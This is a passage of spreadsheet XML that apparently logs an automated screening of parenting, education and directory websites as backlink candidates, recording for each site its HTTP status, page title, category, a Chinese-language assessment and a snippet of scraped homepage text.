      </x:c>
      <x:c r="Q23" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access bloglovin.com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a349b8e868d7f277 &amp;bull; Your IP: Click t</x:v>
      </x:c>
      <x:c r="R23" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S23" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T23" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://bloglovin.com</x:v>
      </x:c>
    </x:row>
    <x:row r="24">
      <x:c r="A24" s="18" t="str">
        <x:v>23</x:v>
      </x:c>
      <x:c r="B24" s="19" t="str">
        <x:v>merakimother.com</x:v>
      </x:c>
      <x:c r="C24" s="19" t="str">
        <x:v>https://merakimother.com</x:v>
      </x:c>
      <x:c r="D24" s="20" t="str">
        <x:v>9</x:v>
      </x:c>
      <x:c r="E24" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F24" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G24" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H24" s="19" t="str">
        <x:v>https://merakimother.com/</x:v>
      </x:c>
      <x:c r="I24" s="19" t="str">
        <x:v>Home - Meraki Mother</x:v>
      </x:c>
      <x:c r="J24" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K24" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L24" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M24" s="19" t="str">
        <x:v>https://merakimother.com/</x:v>
      </x:c>
      <x:c r="N24" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O24" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P24" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q24" s="21" t="str">
        <x:v>Meraki means to put the essence of yourself into something you do, that bit of creativity, love and soul we add to what we love.Meraki Mother is a place where we are inspired &amp; empowered, as women &amp; as mothers. A place to share content that informs, educates &amp; enhances Meraki Mothers lives in a real &amp; authentic way. Home - Meraki Mother Skip to content Menu Home About Contact Privacy Policy &amp; Disclosure Racing Car Craft For Kids Craft Read More 10+ Fun Halloween Games For Toddlers Kids , Kids Party Read More The Ultimate Coffee Body Scrub DIY Guide Beauty Read More Best GPS Watch for Kids Kids , Parenting Read More Categories Home Life DIY Gardening Holidays Home Decor Lifestyle Bullet Journal Health &amp; Fitness Photography Travel For Kids Craft Kids Party For Moms Beauty Everything Baby Kids Parenting Pregnancy &amp; Labor Food Breakfast Keto Recipes Mains Party Food Sides Snacks Desserts All About Money Blogging Family Finances Making Money Home Pumpkin Carving Ideas For Kids Fall is by far my favorite seas</x:v>
      </x:c>
      <x:c r="R24" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S24" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T24" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://merakimother.com</x:v>
      </x:c>
    </x:row>
    <x:row r="25">
      <x:c r="A25" s="18" t="str">
        <x:v>24</x:v>
      </x:c>
      <x:c r="B25" s="19" t="str">
        <x:v>artycraftykids.com</x:v>
      </x:c>
      <x:c r="C25" s="19" t="str">
        <x:v>https://artycraftykids.com</x:v>
      </x:c>
      <x:c r="D25" s="20" t="str">
        <x:v>8</x:v>
      </x:c>
      <x:c r="E25" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F25" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G25" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H25" s="19" t="str">
        <x:v>https://www.artycraftykids.com/</x:v>
      </x:c>
      <x:c r="I25" s="19" t="str">
        <x:v>Art &amp; Craft Ideas for Kids - Arty Crafty Kids</x:v>
      </x:c>
      <x:c r="J25" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K25" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L25" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M25" s="19" t="str">
        <x:v>https://www.artycraftykids.com/</x:v>
      </x:c>
      <x:c r="N25" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O25" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P25" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q25" s="21" t="str">
        <x:v>Explore our treasure trove of fun and unique Art &amp; Craft Ideas for Kids! Hands-on and playful projects will capture imaginations, inspire learning and provide hours of joy to Arty Crafty Kids! Art &amp; Craft Ideas for Kids - Arty Crafty Kids Members Area Login Members Area Login Home About Ideas Art Craft Coloring Pages Educational Search Join Here Home About Ideas Art Craft Coloring Pages Educational Search Join Here Welcome to Arty Crafty Kids! We are a vibrant and dynamic creative hub dedicated to nurturing the artistic spirits of children and families around the world. Creativity is a vital part of a child&amp;rsquo;s development and we strive to provide engaging and inspiring resources to fuel young imaginations! Learn more Join the Fun &amp; Access Our Templates! Make crafting super easy and save time by accessing our full-library of templates, learning resources and ad-free how-to gui</x:v>
      </x:c>
      <x:c r="R25" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S25" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T25" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://artycraftykids.com</x:v>
      </x:c>
    </x:row>
    <x:row r="26">
      <x:c r="A26" s="18" t="str">
        <x:v>25</x:v>
      </x:c>
      <x:c r="B26" s="19" t="str">
        <x:v>findingmyselfyoung.com</x:v>
      </x:c>
      <x:c r="C26" s="19" t="str">
        <x:v>https://findingmyselfyoung.com</x:v>
      </x:c>
      <x:c r="D26" s="20" t="str">
        <x:v>8</x:v>
      </x:c>
      <x:c r="E26" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F26" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G26" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H26" s="19" t="str">
        <x:v>https://www.findingmyselfyoung.com/</x:v>
      </x:c>
      <x:c r="I26" s="19" t="str">
        <x:v>Finding Myself Young</x:v>
      </x:c>
      <x:c r="J26" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K26" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L26" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M26" s="19" t="str">
        <x:v>https://www.findingmyselfyoung.com/</x:v>
      </x:c>
      <x:c r="N26" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O26" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P26" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q26" s="21" t="str">
        <x:v>Finding Myself Young provides play activities and creative ideas to make childhood learning fun. Finding Myself Young ABOUT ME Play _Sensory Play __Materials for Sensory Play __Sensory Bottles __Sensory Bins _Small World Play _Bookish Play _Science Experiments _Fine Motor Fun _Educational Toys _Monthly Play Calendars _Playroom Craft _Recycled Craft _Alphabet crafts _Mother's Day Craft _Halloween Craft _Christmas Craft _How to repurpose craft Books _Book Lists _Book Reviews _Bookish Play _Book Week Ideas _Book Storage Ideas Seasons _Summer _Autumn/Fall _Winter _Spring Holidays _New Years Eve _Australia Day _Valentines Day _St Patricks Day _Easter _Earth Day _Mothers Day _4th of July _Fathers Day _Halloween _Christmas _Elf on the Shelf SHOP Topics 4th of July alphabet animal figurines bac</x:v>
      </x:c>
      <x:c r="R26" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S26" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T26" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://findingmyselfyoung.com</x:v>
      </x:c>
    </x:row>
    <x:row r="27">
      <x:c r="A27" s="18" t="str">
        <x:v>26</x:v>
      </x:c>
      <x:c r="B27" s="19" t="str">
        <x:v>schoolandcollegelistings.com</x:v>
      </x:c>
      <x:c r="C27" s="19" t="str">
        <x:v>https://schoolandcollegelistings.com</x:v>
      </x:c>
      <x:c r="D27" s="20" t="str">
        <x:v>7</x:v>
      </x:c>
      <x:c r="E27" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F27" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G27" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H27" s="19" t="str">
        <x:v>https://www.schoolandcollegelistings.com/</x:v>
      </x:c>
      <x:c r="I27" s="19" t="str">
        <x:v>地元の学校を見つける | SchoolAndCollegeListings</x:v>
      </x:c>
      <x:c r="J27" s="19" t="str">
        <x:v>本地目录</x:v>
      </x:c>
      <x:c r="K27" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L27" s="19" t="str">
        <x:v>本地商家 listing</x:v>
      </x:c>
      <x:c r="M27" s="19" t="str">
        <x:v>https://www.schoolandcollegelistings.com/faq</x:v>
      </x:c>
      <x:c r="N27" s="19" t="str">
        <x:v>付费/不优先</x:v>
      </x:c>
      <x:c r="O27" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P27" s="21" t="str">
        <x:v>需要 Facebook business page，主要面向学校/本地机构；全球在线工具匹配度低。</x:v>
      </x:c>
      <x:c r="Q27" s="21" t="str">
        <x:v>あなたのエリアの地元の学校を見つける。 地元の学校を見つける | SchoolAndCollegeListings ホーム 市 国 (current) ログイン (current) 地元の学校を見つける ホーム SchoolAndCollegeListings へようこそ - 学校のグローバルディレクトリ！ 始めるために、あなたの場所に以下の最寄りの場所を選びました。 詳しい情報に関しては、マップの下のリストでそれぞれクリック。 学校 あなたの学校を学校のトップリストNakano-ku, Tokyoにしたいですか? ここをクリックしてあなたのスポンサー付きリスティングを獲得。 有吉尚子/聴く耳育成メソッド 高円寺南2-37-14クレシェンド高円寺 403 Niki's Kitchen (International cooking class) A Casa de samba Tóquio 〜Lesson &amp; Event〜 東京都渋谷区本町１丁目５６, Shibuya-ku 151-0071 B English Speaking Practice by Voice Typing 英会話 Shibuya-ku C いけばなエブリデースクール 渋谷4-3-20ヴェルデ青山 401, Shibuya-ku 1500002 D 国際バレエアカデミア 本町6-34/11, Shibuya-ku 151-0071 E CASIO ClassPad.net 東京都渋谷区本町1-6/2, Shibuya-ku 151-8543 F サロン ド エルリック G 一般社団法人”人間と性”教育研究協議会 東京都 渋谷区本町1丁目7番16号,</x:v>
      </x:c>
      <x:c r="R27" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S27" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T27" s="21" t="str">
        <x:v>技术上可能能建 listing，但不建议消耗提交额度。 | 请求: https://schoolandcollegelistings.com</x:v>
      </x:c>
    </x:row>
    <x:row r="28">
      <x:c r="A28" s="18" t="str">
        <x:v>27</x:v>
      </x:c>
      <x:c r="B28" s="19" t="str">
        <x:v>myteachingcupboard.com</x:v>
      </x:c>
      <x:c r="C28" s="19" t="str">
        <x:v>https://myteachingcupboard.com</x:v>
      </x:c>
      <x:c r="D28" s="20" t="str">
        <x:v>7</x:v>
      </x:c>
      <x:c r="E28" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F28" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G28" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H28" s="19" t="str">
        <x:v>https://www.myteachingcupboard.com/</x:v>
      </x:c>
      <x:c r="I28" s="19" t="str">
        <x:v>My Teaching Cupboard</x:v>
      </x:c>
      <x:c r="J28" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K28" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L28" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M28" s="19" t="str">
        <x:v>https://www.myteachingcupboard.com/</x:v>
      </x:c>
      <x:c r="N28" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O28" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P28" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q28" s="21" t="str">
        <x:v>Helping dedicated early childhood teachers successfully deliver a balanced, play-based curriculum that still meets the academic standards and benchmarks. My Teaching Cupboard Cart 0 Home Blog Free Resources Store About Me Join My Email Group Cart 0 Home Blog Free Resources Store About Me ALL MY TEACHING RESOURCES ARE DIGITAL DOWNLOADS - GET THEM INSTANTLY Join My Email Group Scroll Engaging Resources to keep your students focused and learning. SHOP NOW The goal of early childhood education should be to activate the child’s own natural desire to learn. Maria Montessori Instantly Download Products To Make Your Teaching Life Easier SHOP INVESTIGATATIONS SHOP LITERACY SHOP MATHS SHOP SCIENCE Latest Products Featured Quick View Mud Kitchen Recipe Cards $3.00 Turn all that mixing, pouring and messy outdoor play into purposeful learning with these M</x:v>
      </x:c>
      <x:c r="R28" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S28" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T28" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://myteachingcupboard.com</x:v>
      </x:c>
    </x:row>
    <x:row r="29">
      <x:c r="A29" s="18" t="str">
        <x:v>28</x:v>
      </x:c>
      <x:c r="B29" s="19" t="str">
        <x:v>mosswoodconnections.com</x:v>
      </x:c>
      <x:c r="C29" s="19" t="str">
        <x:v>https://mosswoodconnections.com</x:v>
      </x:c>
      <x:c r="D29" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="E29" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F29" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G29" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H29" s="19" t="str">
        <x:v>https://www.mosswoodconnections.com/</x:v>
      </x:c>
      <x:c r="I29" s="19" t="str">
        <x:v>Home - Mosswood Connections</x:v>
      </x:c>
      <x:c r="J29" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K29" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L29" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M29" s="19" t="str">
        <x:v>https://www.mosswoodconnections.com/</x:v>
      </x:c>
      <x:c r="N29" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O29" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P29" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q29" s="21" t="str">
        <x:v>We give children the tools they need to reach their full potential. Our focus is positive intervention and parenting strategies that reinforce developing each child’s unique strengths while addressing those special needs that are challenging for them. Home - Mosswood Connections ul"&gt;Menu Search Autism/Special Needs Untitled Untitled Untitled Untitled Untitled Resources Educational Untitled Untitled Untitled Books and Lessons Recommended reading Untitled Untitled Untitled Untitled Parenting Postcards and Quotes Untitled Untitled About Us Our Contributors Contact Us Blog Untitled Subscribe Contact Us Mosswood Connections Mosswood Connections is a resource for childhood development, education, and special needs. Our educational activities are based on the idea that learning should be fun. We encourage children to laugh as they learn. A wealth of activities based on our child-centered, positive reinforcement therapeutic approach; designed to </x:v>
      </x:c>
      <x:c r="R29" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S29" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T29" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mosswoodconnections.com</x:v>
      </x:c>
    </x:row>
    <x:row r="30">
      <x:c r="A30" s="18" t="str">
        <x:v>29</x:v>
      </x:c>
      <x:c r="B30" s="19" t="str">
        <x:v>reachformontessori.com</x:v>
      </x:c>
      <x:c r="C30" s="19" t="str">
        <x:v>https://reachformontessori.com</x:v>
      </x:c>
      <x:c r="D30" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="E30" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F30" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G30" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H30" s="19" t="str">
        <x:v>https://reachformontessori.com/</x:v>
      </x:c>
      <x:c r="I30" s="19" t="str">
        <x:v>The Montessori-Minded Mom — The Montessori-Minded Mom</x:v>
      </x:c>
      <x:c r="J30" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K30" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L30" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M30" s="19" t="str">
        <x:v>https://reachformontessori.com/</x:v>
      </x:c>
      <x:c r="N30" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O30" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P30" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q30" s="21" t="str">
        <x:v>Montessori education and respectful parenting. Activities, gentle parenting advice, toy and book recommendations, and more. The Montessori-Minded Mom — The Montessori-Minded Mom Skip to content The Montessori-Minded Mom Helping you guide your child, the Montessori way! Main Menu Montessori Parenting Menu Toggle Montessori with Babies Behavior and Discipline Montessori Home Areas Resources and Education for Parents Montessori Homeschooling Menu Toggle Language Arts Sensorial Math Practical Life Science and Culture Special Needs Montessori Toys and Books Menu Toggle Ages 0-3 Ages 3-6 Crafts and Activities Menu Toggle Fine Motor Gross Motor Process Art Holiday and Seasonal Crafts Privacy Policy and Terms of Service Montessori Printables Home About The Montessori-Minded Mom Welcome to reachformontessori.com! Learn ev</x:v>
      </x:c>
      <x:c r="R30" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S30" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T30" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://reachformontessori.com</x:v>
      </x:c>
    </x:row>
    <x:row r="31">
      <x:c r="A31" s="18" t="str">
        <x:v>30</x:v>
      </x:c>
      <x:c r="B31" s="19" t="str">
        <x:v>constantcontact.com</x:v>
      </x:c>
      <x:c r="C31" s="19" t="str">
        <x:v>https://constantcontact.com</x:v>
      </x:c>
      <x:c r="D31" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="E31" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F31" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G31" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H31" s="19" t="str">
        <x:v>https://www.constantcontact.com/</x:v>
      </x:c>
      <x:c r="I31" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J31" s="19" t="str">
        <x:v>基础设施/搜索/异常域名</x:v>
      </x:c>
      <x:c r="K31" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L31" s="19" t="str">
        <x:v>referrer 噪声</x:v>
      </x:c>
      <x:c r="M31" s="19" t="str">
        <x:v>https://www.constantcontact.com/</x:v>
      </x:c>
      <x:c r="N31" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O31" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P31" s="21" t="str">
        <x:v>更像搜索、CDN、文档托管、镜像或异常 referrer，不是可开发的内容外链站点。</x:v>
      </x:c>
      <x:c r="Q31" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R31" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S31" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T31" s="21" t="str">
        <x:v>请求: https://constantcontact.com</x:v>
      </x:c>
    </x:row>
    <x:row r="32">
      <x:c r="A32" s="18" t="str">
        <x:v>31</x:v>
      </x:c>
      <x:c r="B32" s="19" t="str">
        <x:v>lulladoll.com</x:v>
      </x:c>
      <x:c r="C32" s="19" t="str">
        <x:v>https://lulladoll.com</x:v>
      </x:c>
      <x:c r="D32" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="E32" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F32" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G32" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H32" s="19" t="str">
        <x:v>https://lulladoll.com/</x:v>
      </x:c>
      <x:c r="I32" s="19" t="str">
        <x:v>Lulla doll by RoRo - Sleep companion for babies &amp;ndash; Lulla Doll USA</x:v>
      </x:c>
      <x:c r="J32" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K32" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L32" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M32" s="19" t="str">
        <x:v>https://lulladoll.com/</x:v>
      </x:c>
      <x:c r="N32" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O32" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P32" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q32" s="21" t="str">
        <x:v>Lulla doll sleep companion for babies imitates closeness of a caregiver at rest with sounds of heartbeat &amp; breathing. Sleep longer, Feel better &amp; Be Safer. Lulla doll by RoRo - Sleep companion for babies &amp;ndash; Lulla Doll USA Skip to content Limited return of the retired Lulla Doll Limited return of the retired Lulla Doll Lulla Doll USA Shop Now Q&amp;A Blog USD Region and language Country/Region No results found Australia AUD $ Canada USD $ Italy EUR € Netherlands EUR € Norway USD $ Taiwan USD $ United Kingdom GBP £ United States USD $ Search More Shop Now Q&amp;A Blog More USD Region and language selector Country/Region No results found Australia AUD $ Canada USD $ Italy EUR € Netherlands EUR € Norway USD $ Taiwan USD $ United Kingdom GBP £ United States USD $ Search Account Your cart is empty Have an account? Log in to check out faster. Continue sh</x:v>
      </x:c>
      <x:c r="R32" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S32" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T32" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://lulladoll.com</x:v>
      </x:c>
    </x:row>
    <x:row r="33">
      <x:c r="A33" s="18" t="str">
        <x:v>32</x:v>
      </x:c>
      <x:c r="B33" s="19" t="str">
        <x:v>yaelkeon.com</x:v>
      </x:c>
      <x:c r="C33" s="19" t="str">
        <x:v>https://yaelkeon.com</x:v>
      </x:c>
      <x:c r="D33" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="E33" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F33" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G33" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H33" s="19" t="str">
        <x:v>https://yaelkeon.com/</x:v>
      </x:c>
      <x:c r="I33" s="19" t="str">
        <x:v>Home - Yael Keon</x:v>
      </x:c>
      <x:c r="J33" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K33" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L33" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M33" s="19" t="str">
        <x:v>https://yaelkeon.com/</x:v>
      </x:c>
      <x:c r="N33" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O33" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P33" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q33" s="21" t="str">
        <x:v>Your Small Business Marketing Simplified : Ditch the Overwhelm and find the Right Strategy for you and your Business. Strategy meets Action. Home - Yael Keon My Business Type Is… Service Provider Ecommerce Store Digital Creator I want to… Get Started with Email Marketing Grow my Email List Know what to Send Increase Sales Improve Accessibility Master Email Automation My Email Software Is… I need help to decide MailerLite ActiveCampaign Klaviyo 0 Items Home About Podcast Blog Work With Me Contact Select Page Email Marketing Strategy &amp; Systems Increase Engagement, Sales and your Sanity Free Mini Training: Find out why your emails aren't working (and what to do about it) WATCH BEYOND WORDS Email Marketing doesn't need to be hard, sleazy or boring It can actually be the opposite. Easy. Engaging. Entertaining. Let me show you how... C</x:v>
      </x:c>
      <x:c r="R33" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S33" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T33" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://yaelkeon.com</x:v>
      </x:c>
    </x:row>
    <x:row r="34">
      <x:c r="A34" s="18" t="str">
        <x:v>33</x:v>
      </x:c>
      <x:c r="B34" s="19" t="str">
        <x:v>hiphoorayletsplay.com</x:v>
      </x:c>
      <x:c r="C34" s="19" t="str">
        <x:v>https://hiphoorayletsplay.com</x:v>
      </x:c>
      <x:c r="D34" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="E34" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F34" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G34" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H34" s="19" t="str">
        <x:v>https://hiphoorayletsplay.com/</x:v>
      </x:c>
      <x:c r="I34" s="19" t="str"/>
      <x:c r="J34" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K34" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L34" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M34" s="19" t="str">
        <x:v>https://hiphoorayletsplay.com/</x:v>
      </x:c>
      <x:c r="N34" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O34" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P34" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q34" s="21" t="str">
        <x:v>Alt Sidebar Random Article Search Home About Contact Home About Contact No Widgets found in the Sidebar Alt! Front headers , Play , Tuff Tray Cardboard Tube Post Drop read more Family Life , Front headers Meet William read more Front headers , Play , Posting Play Feed the Monkey Posting Activity read more Ocean Spaghetti 10 Sink Play Ideas How to Dye Chickpeas for Sensory Play Marble Water Play Number Stairway Natural Loose Part Play Sand and Dinosaur Play Gelli Baff Messy Play Under the Sea Sink Play William’s Cosy Corner Older Posts Search When you love spaghetti bolognese so much it gives 🎅 Christmas Countdown🎅 It’s not quite go ❤️ Family❤️ Thank you @ashleighsheaphoto AD/PR How lovely </x:v>
      </x:c>
      <x:c r="R34" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S34" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T34" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://hiphoorayletsplay.com</x:v>
      </x:c>
    </x:row>
    <x:row r="35">
      <x:c r="A35" s="18" t="str">
        <x:v>34</x:v>
      </x:c>
      <x:c r="B35" s="19" t="str">
        <x:v>freelibrary.org</x:v>
      </x:c>
      <x:c r="C35" s="19" t="str">
        <x:v>https://freelibrary.org</x:v>
      </x:c>
      <x:c r="D35" s="20" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="E35" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F35" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G35" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H35" s="19" t="str">
        <x:v>https://freelibrary.org/</x:v>
      </x:c>
      <x:c r="I35" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J35" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K35" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L35" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M35" s="19" t="str">
